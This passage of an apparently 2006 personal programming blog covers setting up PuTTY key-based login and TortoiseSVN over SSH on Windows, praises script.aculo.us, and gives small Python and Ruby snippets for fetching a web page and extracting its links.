We can now test this by initializing Putty's SSH client and configuring it to use the private key we generated. Under 'Connection > SSH > Auth' we will see an authentication parameters dialog with a field called 'Private key file for Authentication', use the browse button to find your private key file. This tells Putty to use this key to authenticate with the server, under 'Connection > Data' enter in your username under 'Auto-login username'. Go back to 'Session' enter in your server address under 'Host Name' and save your session with a useful name, think of something more descriptive than 'mysession'. Click on the Open button you should be automagically logged-in.

Next step is to setup SVN_SSH environment variable, right click on 'My Computer' and go to properties, 'Advanced > Environment Variables', under 'System Variables', click on new and enter SVN_SSH for the variable name and 'C:\\Program Files\\TortoiseSVN\\bin\\TortoisePlink.exe' for the variable value, make sure the path is correct and using the double back lashes (\\).

Now click on your 'Desktop > TortoiseSVN > Repo-browser', the URL should look something like this svn+ssh://mysession/path/to/svn/repo. There are a few parts to note here, we are asking for SVN over SSH (svn+ssh), we are using the session name you saved under Putty's 'Saved Sessions' dialog, and the full path to the svn repository.

http://www.chiark.greenend.org.uk/~sgtatham/putty/
http://tortoisesvn.tigris.org/

script.aculo.us

2006-09-15T10:19:00.000-07:00

Did you know that the Web2.0 (cough, buzz word) is here? Sure, and it's even more tangible with script.aculo.us, there just nothing better around. I recently impressed everyone at work by integrating script.aculo.us into our Java/Struts (I know) application and gave it some awesome eye candy. Here's a quick couple of examples!

Click here to see some magic!

Click on this square

1st Dive into Python

2006-09-11T15:57:00.000-07:00

Getting the links out of an html document using python's built in regular expressions:

from urllib import urlopen
import re

def links(url):
    socket = urlopen(url)
    html = re.sub('\n', '', socket.read())
    socket.close()
    return re.findall('< a href="(.*?)">.*?< /a>', html, re.IGNORECASE)

The regular expression might not show up as intended!
Remove the space between the less/greater-than sign and the a.

1st Dive into Ruby

2006-09-07T08:30:00.000-07:00

So here's a bit of code that demonstrates how to download a web page:

require 'net/http'
require 'html-parser'

url = URI.parse('http://www.sdsu.edu/')
req = Net::HTTP::Get.new(url.path)
res = Net::HTTP.start(url.host, url.port) {|http|http.request(req)}

puts res.body

Any suggestions on how to get just the links or any tag in particular?

First post, w00t!

2006-09-07T07:52:00.000-07:00

Mammoth